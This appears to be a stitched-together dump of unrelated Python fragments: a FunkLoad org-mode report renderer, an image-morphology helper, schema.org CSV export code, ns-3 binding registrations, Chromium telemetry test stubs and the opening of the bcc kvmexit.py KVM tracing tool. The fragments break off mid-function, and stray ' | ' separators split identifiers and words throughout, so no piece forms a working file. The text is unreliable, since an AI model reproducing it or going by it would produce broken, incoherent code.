# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# 02111-1307, USA.
#
"""Classes that render statistics in emacs org-mode format.
"""
import re
from ReportRenderRst import RenderRst
from ReportRenderRst import BaseRst
import ReportRenderRst
from MonitorPlugins import MonitorPlugins
FL_SITE = "http://funkload.nuxeo.org"
def org_title(title, level=1, newpage=True):
"""Return an org section."""
org = []
if newpage:
org.append("")
org.append("")
org.append("#+BEGIN_LaTeX")
org.append("\\newpage")
org.append('#+END_LaTeX')
org.append('*' * (level - 1) + ' ' + title + '\n')
return '\n'.join(org)
def org_image(self):
org = ["#+BEGIN_LaTeX"]
org.append('\\begin{center}')
for image_name in self.image_names:
org.append("\includegraphics[scale=0.5]{{./%s}.png}" % image_name)
org.append('\\end{center}')
org.append('#+END_LaTeX')
return '\n'.join(org) + '\n'
def org_header(self, with_chart=False):
headers = self.headers[:]
if self.with_percentiles:
self._attach_percentiles_header(headers)
org = [self.render_image()]
org.append("#+BEGIN_LaTeX")
org.append("\\tiny")
org.append('#+END_LaTeX')
org.append(' |' + '|'.join(headers) + '|\n |-')
return '\n'.join(org)
def org_footer(self):
org = [' |-']
org.append("#+BEGIN_LaTeX")
org.append("\\normalsize")
org.append('#+END_LaTeX')
return '\n'.join(org)
ReportRenderRst.rst_title = org_title
ReportRenderRst.LI = '-'
BaseRst.render_header = org_header
BaseRst.render_footer = org_footer
BaseRst.render_image = org_image
BaseRst.sep = '|'
class RenderOrg(RenderRst):
"""Render stats in ReST format."""
# number of slowest requests to display
slowest_items = 5
with_chart = True
def __init__(self, config, stats, error, monitor, monitorconfig, options):
options.html = True
RenderRst.__init__(self, config, stats, error, monitor, monitorconfig, options)
def renderHeader(self):
config = self.config
self.append('# -*- mode: org -*-')
self.append('#+TITLE: FunkLoad bench report')
self.append('#+DATE: ' + self.date)
self.append('''#+STYLE: <link rel="stylesheet" type="text/css" href="eon.css" />
#+LaTeX_CLASS: koma-article
#+LaTeX_CLASS_OPTIONS: [a4paper,landscape]
#+LATEX_HEADER: \usepackage[utf8]{inputenc}
#+LATEX_HEADER: \usepackage[en]{babel}
#+LATEX_HEADER: \usepackage{fullpage}
#+LATEX_HEADER: \usepackage[hyperref,x11names]{xcolor}
#+LATEX_HEADER: \usepackage[colorlinks=true,urlcolor=SteelBlue4,linkcolor=Firebrick4]{hyperref}
#+LATEX_HEADER: \usepackage{graphicx}
#+LATEX_HEADER: \usepackage[T1]{fontenc}''')
description = [config['class_description']]
description += ["Bench result of ``%s.%s``: " % (config['class'],
config['method'])]
description += [config['description']]
self.append('#+TEXT: Bench result of =%s.%s=: %s' % (
config['class'], config['method'], ' '.join(description)))
self.append('#+OPTIONS: toc:1')
self.append('')
def renderMonitor(self, host, charts):
"""Render a monitored host."""
description = self.config.get(host, '')
self.append(org_title("%s: %s" % (host, description), 3))
for chart in charts:
self.append('#+BEGIN_LaTeX')
self.append('\\begin{center}')
self.append("\includegraphics[scale=0.5]{{./%s}.png}" % chart[1])
self.append('\\end{center}')
self.append('#+END_LaTeX')
def renderHook(self):
self.rst = [line.replace('``', '=') for line in self.rst]
lapdex = "Apdex_{%s}" % str(self.options.apdex_t)
kv = re.compile("^(\ *\- [^\:]*)\:(.*)")
bold = re.compile("\*\*([^\*]+)\*\*")
link = re.compile("\`([^\<]+)\<([^\>]+)\>\`\_")
ret = []
for line in self.rst:
line = re.sub(kv, lambda m: "%s :: %s\n\n" % (
m.group(1), m.group(2)), line)
line = re.sub(bold, lambda m: "*%s*" % (m.group(1)),
line)
line = re.sub(link, lambda m: "[[%s][%s]]" % (m.group(2),
m.group(1).strip()),
line)
line = line.replace('|APDEXT|', lapdex)
line = line.replace('Apdex*', lapdex)
line = line.replace('Apdex T', 'Apdex_{T}')
line = line.replace('FunkLoad_',
'[[%s][FunkLoad]]' % FL_SITE)
ret.append(line)
self.rst = ret
def createMonitorCharts(self):
"""Create all montirored server charts."""
if not self.monitor or not self.with_chart:
return
self.append(org_title("Monitored hosts", 2))
charts = {}
for host in self.monitor.keys():
charts[host] = self.createMonitorChart(host)
return charts
def createMonitorChart(self, host):
"""Create m | onitrored server chart | s."""
charts = []
Plugins = MonitorPlugins()
Plugins.registerPlugins()
Plugins.configure(self.getMonitorConfig(host))
for plugin in Plugins.MONITORS.values():
image_path = ('%s_%s' % (host, plugin.name)).replace("\\", "/")
charts.append((plugin.name, image_path))
return charts
|
# -*- enco | ding: utf-8 -*-
# Module iainfgen
from numpy import *
def iainfgen(f, Iab):
from iaunion import iaunion
from iadil import iadil
from ianeg import ianeg
A, Bc = Iab
y = iaunion( iadil(f, A), iadil( ianeg(f), Bc))
return y | |
tqueryGraph(self,graph=None):
self.queryGraph = graph
def setfullGraph(self,graph=None):
self.fullGraph = graph
def setexcludeAttic(self,state):
self.excludeAttic = state
def setmarkdownComments(self,state):
self.markdown = state
def doQuery(self,graph=None,query=None):
res = None
try:
RDFLIBLOCK.acquire()
res = list(graph.query(query))
finally:
RDFLIBLOCK.release()
return res
def outputCSVtypes(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a ?type.
BIND(STR(?term) AS ?strVal)
FILTER NOT EXISTS {?term a rdf:Property}.
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term
''') % atticfilter
try:
RDFLIBLOCK.acquire()
types = list(self.queryGraph.query(query))
finally:
RDFLIBLOCK.release()
#log.info( "Types: %s" % len(types))
self.type2CSV(header=True,out=file)
for t in types:
self.type2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def outputCSVproperties(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a rdf:Property.
FILTER EXISTS {?term rdfs:label ?l}.
BIND(STR(?term) AS ?strVal).
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term''') % atticfilter
props = list(self.queryGraph.query(query))
self.prop2CSV(header=True,out=file)
for t in props:
self.prop2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def prop2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subPropertyOf","equivalentProperty","subproperties","domainIncludes","rang | eIncludes","inverseOf","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer( | out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSuperProperties(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentProperty,graph=graph))
row.append(self.getCSVSubProperties(term,graph=self.fullGraph))
row.append(self.getCSVDomainIncludes(term,graph=self.fullGraph))
row.append(self.getCSVRangeIncludes(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/inverseOf"),graph=graph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
#print term
def type2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subTypeOf","enumerationtype","equivalentClass","properties","subTypes","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
if not isinstance(term, URIRef):
term = URIRef(term)
enumType = self.graphValueToCSV(subject=term,predicate=RDF.type,graph=graph)
if enumType.endswith("#Class"):
enumType = ""
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSupertypes(term,graph=self.fullGraph))
row.append(enumType)
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentClass,graph=graph))
row.append(self.getCSVTypeProperties(term,graph=self.fullGraph))
row.append(self.getCSVSubtypes(term,graph=self.fullGraph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/isPartOf"),graph=graph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
def graphValueToCSV(self, subject=None, predicate= None, object= None, graph=None):
ret = ""
try:
RDFLIBLOCK.acquire()
ret = str(graph.value(subject=subject,predicate=predicate,object=object))
finally:
RDFLIBLOCK.release()
if ret == None or ret == "None":
ret = ""
return ret
def getCSVSupertypes(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subClassOf ?sup.
BIND(STR(?sup) AS ?strVal)
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/")
}
ORDER BY ?sup''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
return ret
def getCSVTypeProperties(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?prop schema:isPartOf <http://attic.schema.org>.}"
query='''select DISTINCT ?prop where{
?term (^rdfs:subClassOf*) <%s>.
?prop <http://schema.org/domainIncludes> ?term.
%s
}
ORDER BY ?prop''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.prop for x in res])
return ret
def getCSVSubtypes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sub where{
?sub rdfs:subClassOf <%s>.
%s
}
ORDER BY ?sub''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sub for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVSupersededBy(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
<%s> schema:supersededBy ?sup.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s supercededBy: '%s'" % (term,ret)
return ret
def getCSVsuperseds(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sup schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
?sup schema:supersededBy <%s>.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s superseds: '%s'" % (term,ret)
return ret
def getCSVSuperProperties(self,term=None,graph=None):
query='''select ?sup where{
<%s> |
transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Application_methods(root_module, cls):
## application.h (module 'network'): ns3::Application::Application(ns3::Application const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Application const &', 'arg0')])
## application.h (module 'network'): ns3::Application::Application() [constructor]
cls.add_constructor([])
## application.h (module 'network'): n | s3::Ptr<ns3::Node> ns3::Application::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_co | nst=True)
## application.h (module 'network'): static ns3::TypeId ns3::Application::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## application.h (module 'network'): void ns3::Application::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## application.h (module 'network'): void ns3::Application::SetStartTime(ns3::Time start) [member function]
cls.add_method('SetStartTime',
'void',
[param('ns3::Time', 'start')])
## application.h (module 'network'): void ns3::Application::SetStopTime(ns3::Time stop) [member function]
cls.add_method('SetStopTime',
'void',
[param('ns3::Time', 'stop')])
## application.h (module 'network'): void ns3::Application::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StartApplication() [member function]
cls.add_method('StartApplication',
'void',
[],
visibility='private', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StopApplication() [member function]
cls.add_method('StopApplication',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
|
device_path, as_root=False): # pylint: disable=W0613
return self.mock_content
def GetProp(self, property_name):
return self.system_properties[property_name]
def SetProp(self, property_name, property_value):
self.system_properties[property_name] = property_value
class CloudStorageModuleStub(object):
PUBLIC_BUCKET = 'chromium-telemetry'
PARTNER_BUCKET = 'chrome-partner-telemetry'
INTERNAL_BUCKET = 'chrome-telemetry'
BUCKET_ALIASES = {
'public': PUBLIC_BUCKET,
'partner': PARTNER_BUCKET,
'internal': INTERNAL_BUCKET,
}
# These are used to test for CloudStorage errors.
INTERNAL_PERMISSION = 2
PARTNER_PERMISSION = 1
PUBLIC_PERMISSION = 0
# Not logged in.
CREDENTIALS_ERROR_PERMISSION = -1
class NotFoundError(Exception):
pass
class CloudStorageError(Exception):
pass
class PermissionError(CloudStorageError):
pass
class CredentialsError(CloudStorageError):
pass
def __init__(self):
self.default_remote_paths = {CloudStorageModuleStub.INTERNAL_BUCKET:{},
CloudStorageModuleStub.PARTNER_BUCKET:{},
CloudStorageModuleStub.PUBLIC_BUCKET:{}}
self.remote_paths = self.default_remote_paths
self.local_file_hashes = {}
self.local_hash_files = {}
self.permission_level = CloudStorageModuleStub.INTERNAL_PERMISSION
self.downloaded_files = []
def SetPermissionLevelForTesting(self, permission_level):
self.permission_level = permission_level
def CheckPermissionLevelForBucket(self, bucket):
if bucket == CloudStorageModuleStub.PUBLIC_BUCKET:
return
elif (self.permission_level ==
CloudStorageModuleStub.CREDENTIALS_ERROR_PERMISSION):
raise CloudStorageModuleStub.CredentialsError()
elif bucket == CloudStorageModuleStub.PARTNER_BUCKET:
if self.permission_level < CloudStorageModuleStub.PARTNER_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket == CloudStorageModuleStub.INTERNAL_BUCKET:
if self.permission_level < CloudStorageModuleStub.INTERNAL_PERMISSION:
raise CloudStorageModuleStub.PermissionError()
elif bucket not in self.remote_paths:
raise CloudStorageModuleStub.NotFoundError()
def SetRemotePathsForTesting(self, remote_path_dict=None):
if not remote_path_dict:
self.remote_paths = self.default_remote_paths
return
self.remote_paths = remote_path_dict
def GetRemotePathsForTesting(self):
if not self.remote_paths:
self.remote_paths = self.default_remote_paths
return self.remote_paths
# Set a dictionary of data files and their "calculated" hashes.
def SetCalculatedHashesForTesting(self, calculated_hash_dictionary):
self.local_file_hashes = calculated_hash_dictionary
def GetLocalDataFiles(self):
return self.local_file_hashes.keys()
# Set a dictionary of hash files and the hashes they should contain.
def SetHashFileContentsForTesting(self, hash_file_dictionary):
self.local_hash_files = hash_file_dictionary
def GetLocalHashFiles(self):
return self.local_hash_files.keys()
def ChangeRemoteHashForTesting(self, bucket, remote_path, new_hash):
self.remote_paths[bucket][remote_path] = new_hash
def List(self, bucket):
if not bucket or not bucket in self.remote_paths:
bucket_error = ('Incorrect bucket specified, correct buckets:' +
str(self.remote_paths))
raise CloudStorageModuleStub.CloudStorageError(bucket_error)
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return list(self.remote_paths[bucket].keys())
def Exists(self, bucket, remote_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
return remote_path in self.remote_paths[bucket]
def Insert(self, bucket, remote_path, local_path):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not local_path in self.GetLocalDataFiles():
file_path_error = 'Local file path does not exist'
raise CloudStorageModuleStub.CloudStorageError(file_path_error)
self.remote_paths[bucket][remote_path] = (
CloudStorageModuleStub.CalculateHash(self, local_path))
return remote_path
def GetHelper(self, bucket, remote_path, local_path, only_if_changed):
CloudStorageModuleStub.CheckPermissionLevelForBucket(self, bucket)
if not remote_path in self.remote_paths[bucket]:
if only_if_changed:
return False
raise CloudStorageModuleStub.NotFoundError('Remote file does not exist.')
remote_hash = self.remote_paths[bucket][remote_path]
local_hash = self.local_file_hashes[local_path]
if only_if_changed and remote_hash == local_hash:
return False
self.downloaded_files.append(remote_path)
self.local_file_hashes[local_path] = remote_hash
self.local_hash_files[local_path + '.sha1'] = remote_hash
return remote_hash
def Get(self, bucket, remote_path, local_path):
return CloudStorageModuleStub.GetHelper(self, bucket, remote_path,
local_path, False)
def GetIfChanged(self, local_ | path, bucket=None):
remote_path = os.path.basename(local_path)
if bucket:
return CloudStor | ageModuleStub.GetHelper(self, bucket, remote_path,
local_path, True)
result = CloudStorageModuleStub.GetHelper(
self, self.PUBLIC_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.PARTNER_BUCKET, remote_path, local_path, True)
if not result:
result = CloudStorageModuleStub.GetHelper(
self, self.INTERNAL_BUCKET, remote_path, local_path, True)
return result
def GetFilesInDirectoryIfChanged(self, directory, bucket):
if os.path.dirname(directory) == directory: # If in the root dir.
raise ValueError('Trying to serve root directory from HTTP server.')
for dirpath, _, filenames in os.walk(directory):
for filename in filenames:
path, extension = os.path.splitext(
os.path.join(dirpath, filename))
if extension != '.sha1':
continue
self.GetIfChanged(path, bucket)
def CalculateHash(self, file_path):
return self.local_file_hashes[file_path]
def ReadHash(self, hash_path):
return self.local_hash_files[hash_path]
class LoggingStub(object):
def __init__(self):
self.warnings = []
self.errors = []
def info(self, msg, *args):
pass
def error(self, msg, *args):
self.errors.append(msg % args)
def warning(self, msg, *args):
self.warnings.append(msg % args)
def warn(self, msg, *args):
self.warning(msg, *args)
class OpenFunctionStub(object):
class FileStub(object):
def __init__(self, data):
self._data = data
def __enter__(self):
return self
def __exit__(self, *args):
pass
def read(self, size=None):
if size:
return self._data[:size]
else:
return self._data
def write(self, data):
self._data.write(data)
def close(self):
pass
def __init__(self):
self.files = {}
def __call__(self, name, *args, **kwargs):
return OpenFunctionStub.FileStub(self.files[name])
class OsModuleStub(object):
class OsEnvironModuleStub(object):
def get(self, _):
return None
class OsPathModuleStub(object):
def __init__(self, sys_module):
self.sys = sys_module
self.files = []
self.dirs = []
def exists(self, path):
return path in self.files
def isfile(self, path):
return path in self.files
def isdir(self, path):
return path in self.dirs
def join(self, *paths):
def IsAbsolutePath(path):
if self.sys.platform.startswith('win'):
return re.match('[a-zA-Z]:\\\\', path)
else:
return path.startswith('/')
# Per Python specification, if any component is an absolute path,
# discard previous components.
for index, path in reversed(list(enumerate(paths))):
if IsAbsolutePath(path):
paths = paths[index:]
|
mexit.py
#
# Display the exit_reason and its statistics of each vm exit
# for all vcpus of all virtual machines. For example:
# $./kvmexit.py
# PID TID KVM_EXIT_REASON COUNT
# 1273551 1273568 EXIT_REASON_MSR_WRITE 6
# 1274253 1274261 EXIT_REASON_EXTERNAL_INTERRUPT 1
# 1274253 1274261 EXIT_REASON_HLT 12
# ...
#
# Besides, we also allow users to specify one pid, tid(s), or one
# pid and its vcpu. See kvmexit_example.txt for more examples.
#
# @PID: each vitual machine's pid in the user space.
# @TID: the user space's thread of each vcpu of that virtual machine.
# @KVM_EXIT_REASON: the reason why the vm exits.
# @COUNT: the counts of the @KVM_EXIT_REASONS.
#
# REQUIRES: Linux 4.7+ (BPF_PROG_TYPE_TRACEPOINT support)
#
# Copyright (c) 2021 ByteDance Inc. All rights reserved.
#
# Author(s):
# Fei Li <lifei.shirley@bytedance.com>
from __future__ import print_function
from time import sleep
from bcc import BPF
import argparse
import multiprocessing
import os
import subprocess
#
# Process Arguments
#
def valid_args_list(args):
args_list = args.split(",")
for arg in args_list:
try:
int(arg)
except:
raise argparse.ArgumentTypeError("must be valid integer")
return args_list
# arguments
examples = """examples:
./kvmexit # Display kvm_exit_reason and its statistics in real-time until Ctrl-C
./kvmexit 5 # Display in real-time after sleeping 5s
./kvmexit -p 3195281 # Collpase all tids for pid 3195281 with exit reasons sorted in descending order
./kvmexit -p 3195281 20 # Collpase all tids for pid 3195281 with exit reasons sorted in descending order, and display after sleeping 20s
./kvmexit -p 3195281 -v 0 # Display only vcpu0 for pid 3195281, descending sort by default
./kvmexit -p 3195281 -a # Display all tids for pid 3195281
./kvmexit -t 395490 # Display only for tid 395490 with exit reasons sorted in descending order
./kvmexit -t 395490 20 # Display only for tid 395490 with exit reasons sorted in descending order after sleeping 20s
./kvmexit -T '395490,395491' # Display for a union like {395490, 395491}
"""
parser = argparse.ArgumentParser(
description="Display kvm_exit_reason and its statistics at a timed interval",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("duration", nargs="?", default=99999999, type=int, help="show delta for next several seconds")
parser.add_argument("-p", "--pid", type=int, help="trace this PID only")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("-t", "--tid", type=int, help="trace this TID only")
exgroup.add_argument("-T", "--tids", type=valid_args_list, help="trace a comma separated series of tids with no space in between")
exgroup.add_argument("-v", "--vcpu", type=int, help="trace this vcpu only")
exgroup.add_argument("-a", "--alltids", action="store_true", help="trace all tids for this pid")
args = parser.parse_args()
duration = int(args.duration)
#
# Setup BPF
#
# load BPF program
bpf_text = """
#include <linux/delay.h>
#define REASON_NUM 69
#define TGID_NUM 1024
struct exit_count {
u64 exit_ct[REASON_NUM];
};
BPF_PERCPU_ARRAY(init_value, struct exit_count, 1);
BPF_TABLE("percpu_hash", u64, struct exit_count, pcpu_kvm_stat, TGID_NUM);
struct cache_info {
u64 cache_pid_tgid;
struct exit_count cache_exit_ct;
};
BPF_PERCPU_ARRAY(pcpu_cache, struct cache_info, 1);
FUNC_ENTRY {
int cache_miss = 0;
int zero = 0;
u32 er = GET_ER;
if (er >= REASON_NUM) {
return 0;
}
u64 cur_pid_tgid = bpf_get_current_pid_tgid();
u32 tgid = cur_pid_tgid >> 32;
u32 pid = cur_pid_tgid;
if (THREAD_FILTER)
return 0;
struct exit_count *tmp_info = NULL, *initial = NULL;
struct cache_info *cache_p;
cache_p = pcpu_cache.lookup(&zero);
if (cache_p == NULL) {
return 0;
}
if (cache_p->cache_pid_tgid == cur_pid_tgid) {
//a. If the cur_pid_tgid hit this physical cpu consecutively, save it to pcpu_cache
tmp_info = &cache_p->cache_exit_ct;
} else {
//b. If another pid_tgid matches this pcpu for the last hit, OR it is the first time to hit this physical cpu.
cache_miss = 1;
// b.a Try to load the last cache struct if exists.
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// b.b If it is the first time for the cur_pid_tgid to hit this pcpu, employ a
// per_cpu array to initialize pcpu_kvm_stat's exit_count with each exit reason's count is zero
if (tmp_info == NULL) {
initial = init_value.lookup(&zero);
if (initial == NULL) {
return 0;
}
pcpu_kvm_stat.update(&cur_pid_tgid, initial);
tmp_info = pcpu_kvm_stat.lookup(&cur_pid_tgid);
// To pass the verifier
if (tmp_info == NULL) {
return 0;
}
}
}
if (er < REASON_NUM) {
tmp_info->exit_ct[er]++;
if (cache_miss == 1) {
if (cache_p->cache_pid_tgid != 0) {
// b.*.a Let's save the last hit cache_info into kvm_stat.
pcpu_kvm_stat.update(&cache_p->cache_pid_tgid, &cache_p->cache_exit_ct);
}
// b.* As the cur_pid_tg | id meets current pcpu_cache_array for the first time, save it.
cache_p->cache_pid_tgid = cur_pid_tgid;
bpf_probe_read(&cache_p->cache_exit_ct, sizeof(*tmp_info), tmp_info);
}
return 0;
}
return 0;
}
"""
# format output
exit_reasons = (
"EXCEPTION_NMI",
"EXTERNAL_INTERRUPT",
"TRIPLE_FAULT",
"INIT_SIGNAL",
"N/A",
"N/A",
"N/A",
"INTERRUPT_WINDOW",
"NMI_WINDOW",
"TASK_SWITCH",
"CPUID",
| "N/A",
"HLT",
"INVD",
"INVLPG",
"RDPMC",
"RDTSC",
"N/A",
"VMCALL",
"VMCLEAR",
"VMLAUNCH",
"VMPTRLD",
"VMPTRST",
"VMREAD",
"VMRESUME",
"VMWRITE",
"VMOFF",
"VMON",
"CR_ACCESS",
"DR_ACCESS",
"IO_INSTRUCTION",
"MSR_READ",
"MSR_WRITE",
"INVALID_STATE",
"MSR_LOAD_FAIL",
"N/A",
"MWAIT_INSTRUCTION",
"MONITOR_TRAP_FLAG",
"N/A",
"MONITOR_INSTRUCTION",
"PAUSE_INSTRUCTION",
"MCE_DURING_VMENTRY",
"N/A",
"TPR_BELOW_THRESHOLD",
"APIC_ACCESS",
"EOI_INDUCED",
"GDTR_IDTR",
"LDTR_TR",
"EPT_VIOLATION",
"EPT_MISCONFIG",
"INVEPT",
"RDTSCP",
"PREEMPTION_TIMER",
"INVVPID",
"WBINVD",
"XSETBV",
"APIC_WRITE",
"RDRAND",
"INVPCID",
"VMFUNC",
"ENCLS",
"RDSEED",
"PML_FULL",
